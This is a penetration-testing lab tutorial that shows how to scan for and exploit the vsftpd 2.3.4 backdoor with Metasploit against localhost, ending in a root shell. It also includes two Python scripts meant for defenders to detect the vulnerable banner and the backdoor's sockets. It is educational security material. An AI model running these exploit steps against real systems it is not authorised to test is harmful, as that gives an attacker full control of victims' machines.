Exploit a Vulnerable vsftpd Service in Metasploit


Introduction

In this lab, you will step into the role of a penetration tester and learn how to use the Metasploit Framework to exploit a known vulnerability in a common service. Specifically, you will target the vsftpd (Very Secure FTP Daemon) version 2.3.4, which contains a famous backdoor.

Metasploit is a powerful open-source penetration testing framework that packages exploits, payloads and supporting tools behind one console, which makes exploiting known vulnerabilities straightforward. It's an essential tool for security professionals. You will follow the standard penetration testing workflow: scanning the target to identify services, finding a suitable exploit, configuring it, and launching the attack to gain control of the target system. For this lab, your target machine is the local environment (localhost).

Identify a vulnerable vsftpd service

In this step, you will perform reconnaissance, the first phase of any penetration test. The goal is to scan the target to discover open ports and identify the versions of the services running on them. This information is crucial for finding potential vulnerabilities. We will use nmap, a powerful network scanning tool, for this purpose.

First, open a terminal. We will scan our local machine, which acts as the target. The IP address for the local machine is 127.0.0.1.

Execute the following nmap command to perform a service version scan (-sV) on the target:

nmap -sV 127.0.0.1

After the scan completes, nmap will report the open ports and the services it identified. For this lab, we are interested in the FTP service running on port 21.

Your output should look similar to this. Note the version information for the FTP service.

Starting Nmap 7.80 ( https://nmap.org ) at ...
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0001s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in ... seconds

The output clearly shows that vsftpd 2.3.4 is running on port 21. This specific version is widely known to contain a backdoor: in 2011 the official 2.3.4 download was briefly replaced with a trojaned copy, which is why the Metasploit module's disclosure date is 2011-07-03. Keep in mind that nmap reads the version from the service banner, so a banner match is a lead to confirm rather than proof; the check step later in this lab does that confirmation.
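As an added, defender-side example (not part of the original lab), the following Python script parses an nmap -sV report like the one above and flags services whose banner matches a known backdoored release. The sample report and the KNOWN_BACKDOORED lookup table are constructed for this example.

```python
import re

# Constructed sample of `nmap -sV` output, modelled on the scan shown above.
SAMPLE_NMAP = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2023-10-27 10:00 EDT
Nmap scan report for localhost (127.0.0.1)
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Nmap done: 1 IP address (1 host up) scanned in 6.50 seconds
"""

# (product, version) pairs known to ship a backdoor; constructed table, extend it from your own feed.
KNOWN_BACKDOORED = {
    ("vsftpd", "2.3.4"): "vsftpd 2.3.4 backdoor (exploit/unix/ftp/vsftpd_234_backdoor)",
}

# One nmap port line, e.g. "21/tcp open  ftp     vsftpd 2.3.4"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

def parse_nmap_services(text):
    """Return one dict per port line of an `nmap -sV` text report; other lines are ignored."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            d = m.groupdict()
            d["port"] = int(d["port"])
            d["version"] = d["version"].strip()
            services.append(d)
    return services

def find_backdoored(services):
    """Flag open services whose 'product version' banner prefix is a known backdoored release."""
    findings = []
    for s in services:
        parts = s["version"].split()
        if s["state"] != "open" or len(parts) < 2:
            continue
        key = (parts[0].lower(), parts[1])
        if key in KNOWN_BACKDOORED:
            findings.append((s["port"], s["version"], KNOWN_BACKDOORED[key]))
    return findings
```

Feed it the saved text of a real scan (nmap -sV -oN report.txt) to get a quick list of ports that deserve a confirmation step before anything else.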

Select the vsftpd_234_backdoor exploit module

In this step, you will launch the Metasploit Framework and find the correct exploit module to attack the vsftpd 2.3.4 service.

First, start the Metasploit console. We use the -q (quiet) flag to skip the banner and start faster.

msfconsole -q

Once Metasploit is loaded, you will see the msf6 > prompt. Now, you can search for exploits related to vsftpd. Use the search command:

search vsftpd

Metasploit will display a list of matching modules. You should see an exploit specifically for the backdoor in vsftpd 2.3.4.

Matching Modules
================

   ##  Name                                 Disclosure Date  Rank       Check  Description
   -  ----                                 ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03     excellent  Yes    VSFTPD v2.3.4 Backdoor Command Execution
   1  auxiliary/scanner/ftp/ftp_version                     normal     No     FTP Version Scanner

The exploit/unix/ftp/vsftpd_234_backdoor module is exactly what we need. It's ranked "excellent," Metasploit's highest reliability rank, meaning the exploit is expected to work reliably and not crash the target service. To load this module, use the use command followed by the module's full name or its number from the search results.

use exploit/unix/ftp/vsftpd_234_backdoor

After you run the command, your prompt will change to msf6 exploit(unix/ftp/vsftpd_234_backdoor) >, indicating that the exploit module is now active.

Set the RHOSTS option to the target IP address

In this step, you will configure the exploit module. Most modules require you to set options, such as the target's IP address.

With the vsftpd_234_backdoor module loaded, you can view its options using the show options command.

show options

This command will display a table of all available options for this module, their current settings, and whether they are required.

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Automatic

As you can see, RHOSTS (Remote Hosts) is required, but it has no value set. You need to set this to the IP address of our target machine, which is 127.0.0.1.

Use the set command to configure the RHOSTS option:

set RHOSTS 127.0.0.1

To confirm that the option was set correctly, you can run show options again. You will see that RHOSTS now has the value 127.0.0.1.

Use the check command to verify the target is vulnerable

In this step, you will use a safe way to test whether the target is actually vulnerable to the selected exploit. Metasploit provides a check command for many modules, which lets you verify the vulnerability without launching the full attack. This reduces the chance of crashing the service and keeps your footprint on the target small.

Now that the exploit module is configured with the target's IP address, simply run the check command:

check

Metasploit will attempt to probe the target service to determine if the backdoor exists. If the target is vulnerable, you will see a confirmation message.

[+] 127.0.0.1:21 - The target is vulnerable.

The message [+] The target is vulnerable. confirms that the vsftpd service on 127.0.0.1 has the backdoor. You are now ready to launch the exploit. If the target were not vulnerable, it would typically report that the target is not exploitable.

Execute the exploit and gain a command shell

In this step, you will execute the exploit to gain unauthorized access to the target system. Since the check command confirmed the target is vulnerable, the exploit should succeed.

The command to launch the attack is exploit. You can also use its alias, run.

exploit

Metasploit will now send the trigger to the vsftpd service. The backdoor opens a command shell listening on a different port (port 6200 in this case), and Metasploit connects to that port, giving you direct command-line access to the target.

The output will look like this:

[*] 127.0.0.1:21 - Found the backdoor service on port 6200!
[*] 127.0.0.1:21 - Sending trigger...
[*] Command shell session 1 opened (127.0.0.1:38974 -> 127.0.0.1:6200) at 2023-10-27 10:30:00 -0400

You now have a command shell on the target machine! Notice the prompt has disappeared. You can now execute commands as if you were logged directly into the target. Let's verify our access level by running the whoami command.

whoami

The output should be:

root

This confirms you have gained a root shell, giving you complete control over the target system. To exit the shell and return to the Metasploit prompt, type exit.
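On the defending side, the same session leaves a visible trace on the host: the backdoor opens an extra listener on port 6200 and the connected shell appears as an established socket on that port. The following added Python example (not part of the original lab) parses constructed ss -tanp output and reports both; the process names and PIDs in the sample are made up.

```python
import re

BACKDOOR_PORT = 6200  # port the vsftpd 2.3.4 backdoor shell listens on (see the session output above)

# Constructed sample of `ss -tanp` output on a host where the backdoor has been triggered.
# Process names and PIDs are made up for the example.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port   Process
LISTEN  0       32      0.0.0.0:21           0.0.0.0:*           users:(("vsftpd",pid=1234,fd=3))
LISTEN  0       1       0.0.0.0:6200         0.0.0.0:*           users:(("vsftpd",pid=1301,fd=5))
ESTAB   0       0       127.0.0.1:6200       127.0.0.1:38974     users:(("sh",pid=1302,fd=0))
ESTAB   0       0       127.0.0.1:22         10.0.0.5:51822      users:(("sshd",pid=900,fd=4))
"""

# One socket line: state, queues, local addr:port, peer addr:port, optional process column.
SOCK_LINE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<laddr>\S+):(?P<lport>\d+|\*)"
    r"\s+(?P<raddr>\S+):(?P<rport>\d+|\*)\s*(?P<proc>.*)$"
)
# Pulls the first ("name",pid=N) pair out of the users:(...) column.
PROC_RE = re.compile(r'\(\("(?P<name>[^"]+)",pid=(?P<pid>\d+)')

def parse_ss(text):
    """Return one dict per socket line of `ss -tanp` output (the header line does not match)."""
    matches = (SOCK_LINE.match(ln.strip()) for ln in text.splitlines())
    return [m.groupdict() for m in matches if m]

def find_backdoor_sockets(socks, port=BACKDOOR_PORT):
    """Report a listener on the backdoor port and every established connection to it."""
    findings = []
    for s in socks:
        if s["lport"] != str(port):
            continue
        pm = PROC_RE.search(s["proc"])
        proc = f'{pm["name"]}(pid={pm["pid"]})' if pm else "unknown process"
        if s["state"] == "LISTEN":
            findings.append(f"listener on port {port} owned by {proc}")
        elif s["state"] == "ESTAB":
            findings.append(f"connection from {s['raddr']}:{s['rport']} to port {port} handled by {proc}")
    return findings
```

An FTP daemon that suddenly owns a second listener, or a shell process attached to a network socket, is the kind of finding worth alerting on regardless of the exact port.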

Summary

Congratulations on successfully completing this lab! You have learned the fundamental workflow of a penetration test using the Metasploit Framework.

In this lab, you have:

  1. Used nmap to perform reconnaissance and identify a vulnerable vsftpd 2.3.4 service.
  2. Launched the Metasploit console and searched for a relevant exploit.
  3. Selected and configured the vsftpd_234_backdoor exploit module by setting the RHOSTS option.
  4. Safely verified the target's vulnerability using the check command.
  5. Executed the exploit command to gain a root-level command shell on the target system.

This exercise demonstrates how a simple, unpatched vulnerability can lead to a full system compromise. It highlights the importance of keeping software updated and the power of tools like Metasploit for both ethical hackers and malicious attackers.